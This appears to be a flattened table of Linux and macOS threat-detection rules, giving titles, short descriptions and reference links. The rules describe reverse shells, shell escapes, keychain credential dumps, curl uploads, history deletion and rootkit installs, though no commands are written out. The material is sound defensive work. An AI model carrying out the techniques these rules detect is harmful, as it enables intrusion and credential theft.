https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md |
Linux Package Uninstall |
Detects linux package removal using builtin tools such as "yum", "apt", "apt-get" or "dpkg". |
https://sysdig.com/blog/mitre-defense-evasion-falco, https://www.tutorialspoint.com/how-to-install-a-software-on-linux-using-yum-command, https://linuxhint.com/uninstall_yum_package/, https://linuxhint.com/uninstall-debian-packages/ |
Shell Execution via Rsync - Linux |
Detects the use of the "rsync" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
|
https://gtfobins.github.io/gtfobins/rsync/#shell |
Suspicious Invocation of Shell via Rsync |
Detects the execution of a shell as sub process of "rsync" without the expected command line flag "-e" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
|
https://sysdig.com/blog/detecting-and-mitigating-cve-2024-12084-rsync-remote-code-execution/, https://gist.github.com/Neo23x0/a20436375a1e26524931dd8ea1a3af10 |
Potential Ruby Reverse Shell |
Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell |
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/ |
Scheduled Cron Task/Job - Linux |
Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md |
Security Software Discovery - Linux |
Detects usage of system utilities (only grep and egrep for now) to discover security software discovery |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md |
Disabling Security Tools |
Detects disabling security tools |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md |
Disable Or Stop Services |
Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services |
https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html |
Setuid and Setgid |
Detects suspicious change of file privileges with chown and chmod commands |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md, https://attack.mitre.org/techniques/T1548/001/ |
Shell Invocation Via Ssh - Linux |
Detects the use of the "ssh" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
|
https://gtfobins.github.io/gtfobins/ssh/, https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html |
Potential Linux Amazon SSM Agent Hijacking |
Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report. |
https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan, https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/, https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/ |
Sudo Privilege Escalation CVE-2019-14287 |
Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287 |
https://www.openwall.com/lists/oss-security/2019/10/14/1, https://access.redhat.com/security/cve/cve-2019-14287, https://twitter.com/matthieugarin/status/1183970598210412546 |
Chmod Suspicious Directory |
Detects chmod targeting files in abnormal directory paths. |
https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md |
Container Residence Discovery Via Proc Virtual FS |
Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem |
https://blog.skyplabs.net/posts/container-detection/, https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker |
Suspicious Curl File Upload - Linux |
Detects a suspicious curl process start the adds a file to a web request |
https://twitter.com/d1r4c/status/1279042657508081664, https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file, https://curl.se/docs/manpage.html, https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html |
Suspicious Curl Change User Agents - Linux |
Detects a suspicious curl process start on linux with set useragent options |
https://curl.se/docs/manpage.html |
Docker Container Discovery Via Dockerenv Listing |
Detects listing or file reading of ".dockerenv" which can be a sing of potential container discovery |
https://blog.skyplabs.net/posts/container-detection/, https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker |
Potentially Suspicious Execution From Tmp Folder |
Detects a potentially suspicious execution of a process located in the '/tmp/' folder |
https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection |
Potential Discovery Activity Using Find - Linux |
Detects usage of "find" binary in a suspicious manner to perform discovery |
https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes |
Suspicious Git Clone - Linux |
Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious |
https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt |
History File Deletion |
Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity |
https://github.com/sleventyeleven/linuxprivchecker/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md |
Print History File Contents |
Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance |
https://github.com/sleventyeleven/linuxprivchecker/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md |
Linux HackTool Execution |
Detects known hacktool execution based on image name. |
https://github.com/Gui774ume/ebpfkit, https://github.com/pathtofile/bad-bpf, https://github.com/carlospolop/PEASS-ng, https://github.com/t3l3machus/hoaxshell, https://github.com/t3l3machus/Villain, https://github.com/HavocFramework/Havoc, https://github.com/1N3/Sn1per, https://github.com/Ne0nd0g/merlin, https://github.com/Pennyw0rth/NetExec/ |
Potential Container Discovery Via Inodes Listing |
Detects listing of the inodes of the "/" directory to determine if the we are running inside of a container. |
https://blog.skyplabs.net/posts/container-detection/, https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker |
Interactive Bash Suspicious Children |
Detects suspicious interactive bash as a parent to rather uncommon child processes |
Internal Research |
Suspicious Java Children Processes |
Detects java process spawning suspicious children |
https://www.tecmint.com/different-types-of-linux-shells/ |
Linux Network Service Scanning Tools Execution |
Detects execution of network scanning and reconnaisance tools. These tools can be used for the enumeration of local or remote network services for example. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md, https://github.com/projectdiscovery/naabu, https://github.com/Tib3rius/AutoRecon |
Linux Shell Pipe to Shell |
Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell |
Internal Research |
Linux Recon Indicators |
Detects events with patterns found in commands used for reconnaissance on linux systems |
https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py |
Potential Suspicious Change To Sensitive/Critical Files |
Detects changes of sensitive and critical files. Monitors files that you don't expect to change without planning on Linux system. |
https://learn.microsoft.com/en-us/azure/defender-for-cloud/file-integrity-monitoring-overview#which-files-should-i-monitor |
Execution Of Script Located In Potentially Suspicious Directory |
Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc. |
https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection |
Shell Execution Of Process Located In Tmp Directory |
Detects execution of shells from a parent process located in a temporary (/tmp) directory |
https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection |
System Information Discovery |
Detects system information discovery commands |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md |
System Network Connections Discovery - Linux |
Detects usage of system utilities to discover system network connections |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md |
System Network Discovery - Linux |
Detects enumeration of local network configuration |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md |
Touch Suspicious Service File |
Detects usage of the "touch" process in service file. |
https://blogs.blackberry.com/, https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 |
Triple Cross eBPF Rootkit Execve Hijack |
Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges |
https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275 |
Triple Cross eBPF Rootkit Install Commands |
Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script |
https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh |
User Has Been Deleted Via Userdel |
Detects execution of the "userdel" binary. Which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks |
https://linuxize.com/post/how-to-delete-group-in-linux/, https://www.cyberciti.biz/faq/linux-remove-user-command/, https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/, https://linux.die.net/man/8/userdel |
User Added To Root/Sudoers Group Using Usermod |
Detects usage of the "usermod" binary to add users add users to the root or suoders groups |
https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/, https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/ |
Vim GTFOBin Abuse - Linux |
Detects the use of "vim" and it's siblings commands to execute a shell or proxy commands.
Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
|
https://gtfobins.github.io/gtfobins/vim/, https://gtfobins.github.io/gtfobins/rvim/, https://gtfobins.github.io/gtfobins/vimdiff/ |
Linux Webshell Indicators |
Detects suspicious sub processes of web server processes |
https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/, https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF |
Download File To Potentially Suspicious Directory Via Wget |
Detects the use of wget to download content to a suspicious directory |
https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection |
Potential Xterm Reverse Shell |
Detects usage of "xterm" as a potential reverse shell tunnel |
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/ |
MacOS Emond Launch Daemon |
Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md, https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 |
Startup Item File Created - MacOS |
Detects the creation of a startup item plist file, that automatically get executed at boot initialization to establish persistence.
Adversaries may use startup items automatically executed at boot initialization to establish persistence.
Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.005/T1037.005.md, https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html |
MacOS Scripting Interpreter AppleScript |
Detects execution of AppleScript of the macOS scripting language AppleScript. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.002/T1059.002.md, https://redcanary.com/blog/applescript/ |
Decode Base64 Encoded Text -MacOs |
Detects usage of base64 utility to decode arbitrary base64-encoded text |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md |
Binary Padding - MacOS |
Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md, https://linux.die.net/man/1/truncate, https://linux.die.net/man/1/dd |
File Time Attribute Change |
Detect file time attribute change to hide new or changes to existing files |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md |
Hidden Flag Set On File/Directory Via Chflags - MacOS |
Detects the execution of the "chflags" utility with the "hidden" flag, in order to hide files on MacOS.
When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers.
|
https://www.sentinelone.com/labs/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/, https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/, https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf, https://ss64.com/mac/chflags.html |
Indicator Removal on Host - Clear Mac System Logs |
Detects deletion of local audit logs |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md |
Clipboard Data Collection Via OSAScript |
Detects possible collection of data from the clipboard via execution of the osascript binary |
https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/ |
Creation Of A Local User Account |
Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md, https://ss64.com/osx/sysadminctl.html |
Hidden User Creation |
Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.002/T1564.002.md |
Credentials from Password Stores - Keychain |
Detects passwords dumps from Keychain |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md, https://gist.github.com/Capybara/6228955 |
System Integrity Protection (SIP) Disabled |
Detects the use of csrutil to disable the Configure System Integrity Protection (SIP). This technique is used in post-exploit scenarios.
|
https://ss64.com/osx/csrutil.html, https://objective-see.org/blog/blog_0x6D.html, https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/, https://www.virustotal.com/gui/file/05a2adb266ec6c0ba9ed176d87d8530e71e845348c13caf9f60049760c312cd3/behavior |
System Integrity Protection (SIP) Enumeration |
Detects the use of csrutil to view the Configure System Integrity Protection (SIP) status. This technique is used in post-exploit scenarios.
|
https://ss64.com/osx/csrutil.html, https://objective-see.org/blog/blog_0x6D.html, https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/, https://www.virustotal.com/gui/file/05a2adb266ec6c0ba9ed176d87d8530e71e845348c13caf9f60049760c312cd3/behavior |
Disable Security Tools |
Detects disabling security tools |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md |
User Added To Admin Group Via Dscl |
Detects attempts to create and add an account to the admin group via "dscl" |
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-2---create-local-account-with-admin-privileges---macos, https://ss64.com/osx/dscl.html |
User Added To Admin Group Via DseditGroup |
Detects attempts to create and/or add an account to the admin group, thus granting admin privileges. |
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-5---add-a-newexisting-user-to-the-admin-group-using-dseditgroup-utility---macos, https://ss64.com/osx/dseditgroup.html |
Root Account Enable Via Dsenableroot |
Detects attempts to enable the root account via "dsenableroot" |
https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1078.003/T1078.003.md, https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/persistence_enable_root_account.toml, https://ss64.com/osx/dsenableroot.html |
File and Directory Discovery - MacOS |
Detects usage of system utilities to discover files and directories |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md |
Credentials In Files |
Detecting attempts to extract passwords with grep and laZagne |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md |
GUI Input Capture - macOS |
Detects attempts to use system dialog prompts to capture user credentials |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md, https://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/ |
Disk Image Creation Via Hdiutil - MacOS |
Detects the execution of the hdiutil utility in order to create a disk image. |
https://www.loobins.io/binaries/hdiutil/, https://www.sentinelone.com/blog/from-the-front-linesunsigned-macos-orat-malware-gambles-for-the-win/, https://ss64.com/mac/hdiutil.html |
Disk Image Mounting Via Hdiutil - MacOS |
Detects the execution of the hdiutil utility in order to mount disk images. |
https://www.loobins.io/binaries/hdiutil/, https://www.sentinelone.com/blog/from-the-front-linesunsigned-macos-orat-malware-gambles-for-the-win/, https://ss64.com/mac/hdiutil.html |
Suspicious Installer Package Child Process |
Detects the execution of suspicious child processes from macOS installer package parent process. This includes osascript, JXA, curl and wget amongst other interpreters |
https://redcanary.com/blog/clipping-silver-sparrows-wings/, https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_installer_package_spawned_network_event.toml |
System Information Discovery Using Ioreg |
Detects the use of "ioreg" which will show I/O Kit registry information.
This process is used for system information discovery.
It has been observed in-the-wild by calling this process directly or using bash and grep to look for specific strings.
|
https://www.virustotal.com/gui/file/0373d78db6c3c0f6f6dcc409821bf89e1ad8c165d6f95c5c80ecdce2219627d7/behavior, https://www.virustotal.com/gui/file/4ffdc72d1ff1ee8228e31691020fc275afd1baee5a985403a71ca8c7bd36e2e4/behavior, https://www.virustotal.com/gui/file/5907d59ec1303cfb5c0a0f4aaca3efc0830707d86c732ba6b9e842b5730b95dc/behavior, https://www.trendmicro.com/en_ph/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html |
JAMF MDM Potential Suspicious Child Process |
Detects potential suspicious child processes of "jamf". Could be a sign of potential abuse of Jamf as a C2 server as seen by Typhon MythicAgent. |
https://github.com/MythicAgents/typhon/, https://www.zoocoup.org/casper/jamf_cheatsheet.pdf, https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html |
JAMF MDM Execution |
Detects execution of the "jamf" binary to create user accounts and run commands. For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control polices.
|
https://github.com/MythicAgents/typhon/, https://www.zoocoup.org/casper/jamf_cheatsheet.pdf, https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html |
JXA In-memory Execution Via OSAScript |
Detects possible malicious execution of JXA in-memory via OSAScript |
https://redcanary.com/blog/applescript/ |
Launch Agent/Daemon Execution Via Launchctl |
Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.001/T1569.001.md, https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/, https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/, https://www.trendmicro.com/en_us/research/18/d/new-macos-backdoor-linked-to-oceanlotus-found.html, https://www.loobins.io/binaries/launchctl/ |
Local System Accounts Discovery - MacOs |
Detects enumeration of local systeam accounts on MacOS |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md |
Local Groups Discovery - MacOs |
Detects enumeration of local system groups |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md |
MacOS Network Service Scanning |
Detects enumeration of local or remote network services. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md |
Network Sniffing - MacOs |
Detects the usage of tooling to sniff network traffic.
An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md |
File Download Via Nscurl - MacOS |
Detects the execution of the nscurl utility in order to download files. |
https://www.loobins.io/binaries/nscurl/, https://www.agnosticdev.com/content/how-diagnose-app-transport-security-issues-using-nscurl-and-openssl, https://gist.github.com/nasbench/ca6ef95db04ae04ffd1e0b1ce709cadd |
Suspicious Microsoft Office Child Process - MacOS |
Detects suspicious child processes spawning from microsoft office suite applications such as word or excel. This could indicates malicious macro execution |
https://redcanary.com/blog/applescript/, https://objective-see.org/blog/blog_0x4B.html |
OSACompile Run-Only Execution |
Detects potential suspicious run-only executions compiled using OSACompile |
https://redcanary.com/blog/applescript/, https://ss64.com/osx/osacompile.html |
Payload Decoded and Decrypted via Built-in Utilities |
Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer. |
https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d42c3d772e04f1e8d0eb60f5233bc79def1ea73105a2d8822f44164f77ef823 |
Potential Persistence Via PlistBuddy |
Detects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility |
https://redcanary.com/blog/clipping-silver-sparrows-wings/, https://www.manpagez.com/man/8/PlistBuddy/ |
Remote Access Tool - Team Viewer Session Started On MacOS Host |
Detects the command line executed when TeamViewer starts a session started by a remote host.
Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.
|
Internal Research |
Macos Remote System Discovery |
Detects the enumeration of other remote systems. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md |
Scheduled Cron Task/Job - MacOs |
Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md |
Screen Capture - macOS |
Detects attempts to use screencapture to collect macOS screenshots |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md, https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py |
Security Software Discovery - MacOs |
Detects usage of system utilities (only grep for now) to discover security software discovery |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md |
Space After Filename - macOS |
Detects attempts to masquerade as legitimate files by adding a space to the end of the filename. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.006/T1036.006.md |
Split A File Into Pieces |
Detection use of the command "split" to split files into parts and possible transfer. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md |
Osacompile Execution By Potentially Suspicious Applet/Osascript |
Detects potential suspicious applet or osascript executing "osacompile". |
https://redcanary.com/blog/mac-application-bundles/ |
Suspicious Browser Child Process - MacOS |
Detects suspicious child processes spawned from browsers. This could be a result of a potential web browser exploitation. |
https://fr.slideshare.net/codeblue_jp/cb19-recent-apt-attack-on-crypto-exchange-employees-by-heungsoo-kang, https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_initial_access_suspicious_browser_childproc.toml |
Suspicious Execution via macOS Script Editor |
Detects when the macOS Script Editor utility spawns an unusual child process. |
https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685, https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/ |
Potential Discovery Activity Using Find - MacOS |
Detects usage of "find" binary in a suspicious manner to perform discovery |
https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes |
Suspicious History File Operations |
Detects commandline operations on shell history files |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md |
Potential In-Memory Download And Compile Of Payloads |
Detects potential in-memory downloading and compiling of applets using curl and osacompile as seen used by XCSSET malware |
https://redcanary.com/blog/mac-application-bundles/ |
Suspicious MacOS Firmware Activity |
Detects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers. |
https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml, https://www.manpagez.com/man/8/firmwarepasswd/, https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web |
System Network Discovery - macOS |
Detects enumeration of local network configuration |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md |
System Information Discovery Using sw_vers |
Detects the use of "sw_vers" for system information discovery |
https://www.virustotal.com/gui/file/d3fa64f63563fe958b75238742d1e473800cb5f49f5cb79d38d4aa3c93709026/behavior, https://www.virustotal.com/gui/file/03b71eaceadea05bc0eea5cddecaa05f245126d6b16cfcd0f3ba0442ac58dab3/behavior, https://ss64.com/osx/sw_vers.html |
User Added To Admin Group Via Sysadminctl |
Detects attempts to create and add an account to the admin group via "sysadminctl" |
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos, https://ss64.com/osx/sysadminctl.html |
Guest Account Enabled Via Sysadminctl |
Detects attempts to enable the guest account using the sysadminctl utility |
https://ss64.com/osx/sysadminctl.html |
System Information Discovery Via Sysctl - MacOS |
Detects the execution of "sysctl" with specific arguments that have been used by threat actors and malware. It provides system hardware information.
This process is primarily used to detect and avoid virtualization and analysis environments.
|
https://www.loobins.io/binaries/sysctl/#, https://evasions.checkpoint.com/techniques/macos.html, https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/, https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/, https://objective-see.org/blog/blog_0x1E.html, https://www.virustotal.com/gui/file/1c547a064494a35d6b5e6b459de183ab2720a22725e082bed6f6629211f7abc1/behavior, https://www.virustotal.com/gui/file/b4b1fc65f87b3dcfa35e2dbe8e0a34ad9d8a400bec332025c0a2e200671038aa/behavior |
System Information Discovery Using System_Profiler |
Detects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information.
This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes.
|
https://www.trendmicro.com/en_za/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html, https://www.sentinelone.com/wp-content/uploads/pdf-gen/1630910064/20-common-tools-techniques-used-by-macos-threat-actors-malware.pdf, https://ss64.com/mac/system_profiler.html, https://objective-see.org/blog/blog_0x62.html, https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/, https://gist.github.com/nasbench/9a1ba4bc7094ea1b47bc42bf172961af |
System Network Connections Discovery - MacOs |
Detects usage of system utilities to discover system network connections |
